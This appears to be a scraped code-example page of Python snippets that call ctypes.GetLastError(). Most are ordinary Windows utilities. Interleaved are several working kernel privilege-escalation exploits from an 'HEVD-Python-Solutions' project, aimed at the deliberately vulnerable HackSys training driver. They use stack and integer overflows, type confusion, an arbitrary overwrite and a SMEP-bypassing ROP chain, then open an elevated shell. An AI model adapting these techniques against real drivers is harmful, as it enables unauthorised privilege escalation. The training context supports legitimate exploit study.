def window__activate(hwnd):
# Give the window the focus. This is the Microsoft Magic Focus Dance.
current_hwnd = windll.user32.GetForegroundWindow()
current_thread_id = windll.kernel32.GetCurrentThreadId()
thread_process_id = windll.user32.GetWindowThreadProcessId(current_hwnd, None)
if thread_process_id != current_thread_id:
res = windll.user32.AttachThreadInput(thread_process_id, current_thread_id, True)
# ERROR_INVALID_PARAMETER means that the two threads are already attached.
if res == 0 and GetLastError() != ERROR_INVALID_PARAMETER:
# TODO better logging
print("WARN: could not attach thread input to thread {0} ({1})".format(thread_process_id, GetLastError()))
return True
res = windll.user32.SetWindowPos(hwnd, HWND_TOPMOST, 0, 0, 0, 0, SWP_NOSIZE | SWP_NOMOVE)
if res == 0:
return False
# At this point, the window hwnd is valid, so we don't need to fail out
# if the results are non-zero. Some of these will not succeed due to
# attributes of the window, rather than the window not existing.
windll.user32.SetWindowPos(hwnd, HWND_NOTOPMOST, 0, 0, 0, 0, SWP_NOSIZE | SWP_NOMOVE)
windll.user32.AttachThreadInput(thread_process_id, current_thread_id, False)
windll.user32.SetForegroundWindow(hwnd)
windll.user32.SetFocus(hwnd)
windll.user32.SetActiveWindow(hwnd)
return True
python类GetLastError()的实例源码
def open(self):
"""
Open device to query properties
:return: context
"""
handle = _setupapi.SetupDiCreateDeviceInfoList(None, None)
if handle == -1:
err_no = ctypes.GetLastError()
raise WindowsError(err_no, ctypes.FormatError(err_no))
try:
dev_info = DeviceInfoData()
if not _setupapi.SetupDiOpenDeviceInfoW(handle, ctypes.create_unicode_buffer(self._instance_id), None,
DIOD_INHERIT_CLASSDRVS, ctypes.byref(dev_info)):
err_no = ctypes.GetLastError()
raise WindowsError(err_no, ctypes.FormatError(err_no))
self._handle = (handle, dev_info, self._handle) # Stack
yield self
finally:
if self._handle is not None and \
self._handle[0] == handle: # If last handle is opened in this function, pop it
self._handle = self._handle[2]
_setupapi.SetupDiDestroyDeviceInfoList(handle) # Close handle
def get_property_keys(self):
"""
Get all device property keys
:return: Iterable of device property keys
"""
if self._handle is None:
with self.open():
return self.get_property_keys()
handle, dev_info, _ = self._handle
required_size = ctypes.c_ulong()
if not _setupapi.SetupDiGetDevicePropertyKeys(handle, ctypes.byref(dev_info), None, 0,
ctypes.byref(required_size), 0):
err_no = ctypes.GetLastError()
if err_no == 122: # ERROR_INSUFFICIENT_BUFFER
# noinspection SpellCheckingInspection
devpkeys = (DevicePropertyKey * required_size.value)()
if _setupapi.SetupDiGetDevicePropertyKeys(handle, ctypes.byref(dev_info), ctypes.byref(devpkeys),
required_size.value, None, 0):
return list(devpkeys)
err_no = ctypes.GetLastError()
raise WindowsError(err_no, ctypes.FormatError(err_no))
return []
def trigger_integer_overflow():
dwReturn = c_ulong()
driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
if not driver_handle or driver_handle == -1:
print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
sys.exit()
# [-- BUFFER PADDING --][-- EXTRA PADDING --][-- SHELLCODE PTR --][-- STRING TERMINATOR --]
print "[+] Constructing overflow string"
evil_input = "A" * 0x800 + "BBBB" * 10 + struct.pack("<L",heap_alloc_payload()) + struct.pack("<L",0xBAD0B0B0)
evil_size = len(evil_input)
evil_input_ptr = id(evil_input) + 20
print "[+] Buf size: %d" % evil_size
einput = create_string_buffer(evil_input, evil_size)
print "[+] Triggering vuln .."
kernel32.DeviceIoControl(driver_handle, 0x222027, evil_input_ptr, 0xFFFFFFFF, None, 0,byref(dwReturn), None)
if shell.IsUserAnAdmin():
print "[*] Enjoy Elevated Privs !\r\n"
os.system('cmd.exe')
else:
print "[-] Exploit did not work. Re-run it!"
HEVD_nullpointerdereference.py 文件源码
项目:HEVD-Python-Solutions
作者: GradiusX
项目源码
文件源码
阅读 24
收藏 0
点赞 0
评论 0
def trigger_nullpointer_dereference():
dwReturn = c_ulong()
driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
if not driver_handle or driver_handle == -1:
print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
sys.exit()
NtAllocateVirtualMemory_shellcode_ptr()
magicvalue = struct.pack("<L", 0xBAD0B0B1) #as long as it's not 0xBAD0B0B0
magicvalue_size = len(magicvalue)
magicvalue_ptr = id(magicvalue) + 20
dev_ioctl = kernel32.DeviceIoControl(driver_handle, 0x22202B, magicvalue_ptr, magicvalue_size, None, 0,byref(dwReturn), None)
if shell.IsUserAnAdmin():
print "[*] Enjoy Elevated Privs !\r\n"
os.system('cmd.exe')
else:
print "[-] Exploit did not work. Re-run it!"
def trigger_stack_overflow():
dwReturn = c_ulong()
driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
if not driver_handle or driver_handle == -1:
print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
sys.exit()
print "[+] Constructing malicious buffer"
evil_input = "\x41" * 2080 + struct.pack("<L",heap_alloc_payload())
evil_size = len(evil_input)
evil_input_ptr = id(evil_input) + 20
print "[+] Buf size: %d" % evil_size
print "[+] Sending malicious buffer"
print "[+] Triggering vuln .."
kernel32.DeviceIoControl(driver_handle, 0x222003, evil_input_ptr, evil_size, None, 0,byref(dwReturn) , None)
if shell.IsUserAnAdmin():
print "[*] Enjoy Elevated Privs !\r\n"
os.system('cmd.exe')
else:
print "[!] Exploit did not work. Re-run it!"
def trigger_stack_overflow_GS():
dwReturn = c_ulong()
driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
if not driver_handle or driver_handle == -1:
print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
sys.exit()
buffer_ptr, buffer_size = create_map_file()
print "[+] Sending malicious buffer"
print "[+] Triggering vuln .."
# Note buffer_size + 4 : +4 resides outside the mapped file to trigger an exception when memcpy the region
# before GS check, which BSODs box
kernel32.DeviceIoControl(driver_handle, 0x222007, buffer_ptr, buffer_size + 4, None, 0,byref(dwReturn) , None)
if shell.IsUserAnAdmin():
print "[*] Enjoy Elevated Privs !\r\n"
os.system('cmd.exe')
else:
print "[!] Exploit did not work. Re-run it!"
HEVD_uninitializedheapvariable.py 文件源码
项目:HEVD-Python-Solutions
作者: GradiusX
项目源码
文件源码
阅读 23
收藏 0
点赞 0
评论 0
def trigger_uninitialized_heap_variable():
dwReturn = c_ulong()
driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
if not driver_handle or driver_handle == -1:
print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
sys.exit()
magicvalue = struct.pack('<I', 0xBAD0B0B1)
magicvalue_ptr = id(magicvalue) + 20
magicvalue_size = len(magicvalue)
tainting_lookaside()
print "[+] Triggering vuln .."
kernel32.DeviceIoControl(driver_handle, 0x00222033, magicvalue_ptr, magicvalue_size, None, 0,byref(dwReturn), None)
if shell.IsUserAnAdmin():
print "[*] Enjoy Elevated Privs !\r\n"
os.system('cmd.exe')
else:
print "[-] Exploit did not work. Re-run it!"
def fcntl(fd, op, arg=0):
if op == F_GETFD or op == F_GETFL:
return 0
elif op == F_SETFD:
# Check that the flag is CLOEXEC and translate
if arg == FD_CLOEXEC:
success = SetHandleInformation(fd, HANDLE_FLAG_INHERIT, arg)
if not success:
raise ctypes.GetLastError()
else:
raise ValueError("Unsupported arg")
#elif op == F_SETFL:
## Check that the flag is NONBLOCK and translate
#if arg == os.O_NONBLOCK:
##pass
#result = ioctlsocket(fd, FIONBIO, 1)
#if result != 0:
#raise ctypes.GetLastError()
#else:
#raise ValueError("Unsupported arg")
else:
raise ValueError("Unsupported op")
def _monitor(self):
buff = ctypes.create_string_buffer(_BUFF_SIZE)
while not self._stop.isSet():
size_returned = ctypes.c_ulong(0)
result = ctypes.windll.kernel32.ReadDirectoryChangesW(
self._directory_handle,
buff,
ctypes.c_ulong(_BUFF_SIZE),
True, # recursive.
ctypes.c_ulong(_FILE_NOTIFY_CHANGE_ANY),
ctypes.byref(size_returned),
None,
None) # this is a blocking call.
if result == 0 and ctypes.GetLastError() == _ERROR_NOTIFY_ENUM_DIR:
logging.warning('Buffer overflow while monitoring for file changes.')
# we need to notify that something changed anyway
with self._lock:
self._change_set |= {'Unknown file'}
if result != 0 and size_returned.value != 0:
additional_changes = _parse_buffer(buff)
with self._lock:
self._change_set |= additional_changes
self._change_event.set()
def _send_msg(self, msgId, wparam=0, lparam=0):
"""
A util method to send a simple message to a window. Lazy init is
supported.
"""
for i in range(2):
try:
ctypes.windll.kernel32.SetLastError(0)
result = ctypes.windll.user32.SendMessageW(
self.wa_hwnd, msgId, wparam, lparam)
winerr = ctypes.GetLastError()
except Exception:
return None
if winerr == 0:
return result
elif winerr == WinampRemote._WINERR_INVALID_WINDOW_HANDLE:
try: # we've lost winamp, try to find it a last time
if self._find_winamp():
continue
except:
pass
return None
return None
def _read_remote_string(self, address, as_unicode=True):
"""Reads a string from Winamp's memory address space."""
if not self.wa_hproc:
#print("Trying to read Winamp's memory without having found any instance!")
return None
buflen = 1024
if as_unicode:
buffer = ctypes.create_unicode_buffer(buflen)
else:
buffer = ctypes.create_string_buffer(buflen)
bytes_read = ctypes.c_size_t(0)
if not ctypes.windll.kernel32.ReadProcessMemory(
self.wa_hproc, address, buffer, buflen, ctypes.byref(bytes_read)):
winerr = ctypes.GetLastError()
#print(
# "Failed to read memory from Winamp's memory space:",
# ctypes.FormatError(winerr))
return None
return buffer.value
def get_process_image_path(proc_id):
"""
Return the full path of the PE image of the given process ID.
Raises a OSError exception on error.
"""
# get process handle
# PROCESS_QUERY_INFORMATION = 0x400
hproc = ctypes.windll.kernel32.OpenProcess(0x400, False, proc_id)
if not hproc:
raise ctypes.WinError()
# get image path
# MAX_PATH is 260 but we're using the Unicode variant of the API
max_length = 1024
length = ctypes.c_ulong(max_length)
buff = ctypes.create_unicode_buffer(max_length)
ctypes.windll.kernel32.SetLastError(0)
res = ctypes.windll.kernel32.QueryFullProcessImageNameW(
hproc, 0, buff, ctypes.byref(length))
error = ctypes.GetLastError()
ctypes.windll.kernel32.CloseHandle(hproc)
ctypes.windll.kernel32.SetLastError(error)
if not res:
raise ctypes.WinError()
return buff.value
def set_close_exec(fd):
success = SetHandleInformation(fd, HANDLE_FLAG_INHERIT, 0)
if not success:
raise ctypes.GetLastError()
def set_close_exec(fd):
success = SetHandleInformation(fd, HANDLE_FLAG_INHERIT, 0)
if not success:
raise ctypes.GetLastError()
def set_close_exec(fd):
success = SetHandleInformation(fd, HANDLE_FLAG_INHERIT, 0)
if not success:
raise ctypes.GetLastError()
def _attach_message_queue_to_thread(current_hwnd):
current_thread_id = windll.kernel32.GetCurrentThreadId()
thread_process_id = windll.user32.GetWindowThreadProcessId(current_hwnd, None)
if thread_process_id != current_thread_id:
res = windll.user32.AttachThreadInput(thread_process_id, current_thread_id, True)
# ERROR_INVALID_PARAMETER means that the two threads are already attached.
if res == 0 and GetLastError() != ERROR_INVALID_PARAMETER:
# TODO better logging
print("WARN: could not attach thread input to thread {0} ({1})".format(thread_process_id, GetLastError()))
return True
windll.user32.AttachThreadInput(thread_process_id, current_thread_id, False)
return False
def set_close_exec(fd):
success = SetHandleInformation(fd, HANDLE_FLAG_INHERIT, 0)
if not success:
raise ctypes.GetLastError()
def pipe_non_blocking_is_error_blocking(ex):
if not isinstance(ex, PortableBlockingIOError):
return False
from ctypes import GetLastError
ERROR_NO_DATA = 232
return (GetLastError() == ERROR_NO_DATA)
def __init__(self, guid="{00000000-0000-0000-0000-000000000000}"):
super().__init__()
if isinstance(guid, str):
ret = _ole32.CLSIDFromString(ctypes.create_unicode_buffer(guid), ctypes.byref(self))
if ret < 0:
err_no = ctypes.GetLastError()
raise WindowsError(err_no, ctypes.FormatError(err_no), guid)
else:
ctypes.memmove(ctypes.byref(self), bytes(guid), ctypes.sizeof(self))
def __str__(self):
s = ctypes.c_wchar_p()
ret = _ole32.StringFromCLSID(ctypes.byref(self), ctypes.byref(s))
if ret < 0:
err_no = ctypes.GetLastError()
raise WindowsError(err_no, ctypes.FormatError(err_no))
ret = str(s.value)
_ole32.CoTaskMemFree(s)
return ret
def set_close_exec(fd):
success = SetHandleInformation(fd, HANDLE_FLAG_INHERIT, 0)
if not success:
raise ctypes.GetLastError()
def set_close_exec(fd):
success = SetHandleInformation(fd, HANDLE_FLAG_INHERIT, 0)
if not success:
raise ctypes.GetLastError()
def set_close_exec(fd):
success = SetHandleInformation(fd, HANDLE_FLAG_INHERIT, 0)
if not success:
raise ctypes.GetLastError()
def set_close_exec(fd):
success = SetHandleInformation(fd, HANDLE_FLAG_INHERIT, 0)
if not success:
raise ctypes.GetLastError()
def set_close_exec(fd):
success = SetHandleInformation(fd, HANDLE_FLAG_INHERIT, 0)
if not success:
raise ctypes.GetLastError()
HEVD_arbitraryoverwrite.py 文件源码
项目:HEVD-Python-Solutions
作者: GradiusX
项目源码
文件源码
阅读 27
收藏 0
点赞 0
评论 0
def trigger_arbitrary_overwrite():
dwReturn = c_ulong()
driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
if not driver_handle or driver_handle == -1:
print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
sys.exit()
# [ -- WHAT (Shellcode pointer) -- ] [ -- WHERE (HDT_kernel_address + 4)-- ]
write_what = heap_alloc_payload()
write_where = get_HDT_kernel_address() + 4
write_what_ptr = c_void_p(write_what)
evil_input = struct.pack("<L", addressof(write_what_ptr)) + struct.pack("<L", write_where)
evil_input_ptr = id(evil_input) + 20
evil_size = len(evil_input)
print "[+] Writing 0x%X at address 0x%X" % (write_what, write_where)
kernel32.DeviceIoControl(driver_handle, 0x22200B, evil_input_ptr, evil_size, None, 0,byref(dwReturn), None)
print "[+] Calling NtQueryIntervalProfile to trigger vuln"
arb = c_ulong(0)
ntdll.NtQueryIntervalProfile(0x1337, byref(arb))
if shell.IsUserAnAdmin():
print "[*] Enjoy Elevated Privs !\r\n"
os.system('cmd.exe')
else:
print "[-] Exploit did not work. Re-run it!"
HEVD_ununitializedstackvariable.py 文件源码
项目:HEVD-Python-Solutions
作者: GradiusX
项目源码
文件源码
阅读 20
收藏 0
点赞 0
评论 0
def trigger_uninitialized_stack_variable():
dwReturn = c_ulong()
driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
if not driver_handle or driver_handle == -1:
print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
sys.exit()
magicvalue = struct.pack("<L", 0xBAD0B0B1) #as long as it's not 0xBAD0B0B0
magicvalue_ptr = id(magicvalue) + 20
magicvalue_size = len(magicvalue)
print "[+] Buf size: %d" % magicvalue_size
einput = create_string_buffer(magicvalue, magicvalue_size)
# stack spray
shellcode_ptr = heap_alloc_payload()
print "[+] Spraying stack with address: 0x%X" % shellcode_ptr
print "[+] Triggering vuln .."
ntdll.NtMapUserPhysicalPages(0, 1024, struct.pack("<L", shellcode_ptr) * 1024)
kernel32.DeviceIoControl(driver_handle, 0x22202F, magicvalue_ptr, magicvalue_size, None, 0,byref(dwReturn), None)
if shell.IsUserAnAdmin():
print "[*] Enjoy Elevated Privs !\r\n"
os.system('cmd.exe')
else:
print "[-] Exploit did not work. Re-run it!"
def trigger_type_confusion():
dwReturn = c_ulong()
driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
if not driver_handle or driver_handle == -1:
print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
sys.exit()
####
# typedef struct _USER_TYPE_CONFUSION_OBJECT {
# ULONG ObjectID;
# ULONG ObjectType;
# } USER_TYPE_CONFUSION_OBJECT, *PUSER_TYPE_CONFUSION_OBJECT;
####
print "[+] Constructing USER_TYPE_CONFUSION_OBJECT"
evil_input = "\x41" * 4 + struct.pack("<L",heap_alloc_payload())
evil_input_ptr = id(evil_input) + 20
evil_size = len(evil_input)
print "[+] Buf size: %d" % evil_size
print "[+] Sending confusion object"
print "[+] Triggering vuln .."
dev_ioctl = kernel32.DeviceIoControl(driver_handle, 0x222023, evil_input_ptr, evil_size, None, 0,byref(dwReturn) , None)
if shell.IsUserAnAdmin():
print "[*] Enjoy Elevated Privs !\r\n"
os.system('cmd.exe')
else:
print "[!] Exploit did not work. Re-run it!"
def trigger_stack_overflow():
dwReturn = c_ulong()
driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
if not driver_handle or driver_handle == -1:
debug_print ("[!] Driver handle not found : Error " + str(ctypes.GetLastError()))
sys.exit()
base_addresses = get_base_address(["hal.dll", "win32kfull.sys"])
hal_base_address = base_addresses[0]
win32kfull_base_address = base_addresses[1]
shellcode_ptr = virtual_alloc_payload()
debug_print ("[+] Constructing malicious buffer w/ ROP chain")
evil_input = "\x41" * 0x808 # junk
evil_input += struct.pack("<Q", win32kfull_base_address + 0xD1122) # POP RDX; RETN
evil_input += struct.pack("<Q", 0x63000000) # 0x63000000 -> Supervisor Mode
evil_input += struct.pack("<Q", hal_base_address + 0xFDB2) # POP RAX; RETN
evil_input += struct.pack("<Q", get_pxe_address(shellcode_ptr) - 3) # PTE(shellcode ptr) - 3
evil_input += struct.pack("<Q", hal_base_address + 0x9943) # MOV [RAX], EDX; RETN
evil_input += struct.pack("<Q", hal_base_address + 0x19B20) # Invalidate Cache
evil_input += struct.pack("<Q", shellcode_ptr) # shellcode ptr
evil_size = len(evil_input)
evil_input_ptr = id(evil_input) + 32
debug_print ("[+] Buf size: 0x%X" % evil_size)
debug_print ("[+] Sending malicious buffer")
debug_print ("[+] Triggering vuln ..")
kernel32.DeviceIoControl(driver_handle, 0x222003, evil_input_ptr, evil_size, None, 0,byref(dwReturn), None)
if shell.IsUserAnAdmin():
debug_print ("[*] Enjoy Elevated Privs !\n")
os.system('cmd.exe')
else:
debug_print ("[!] Exploit did not work. Re-run it!")
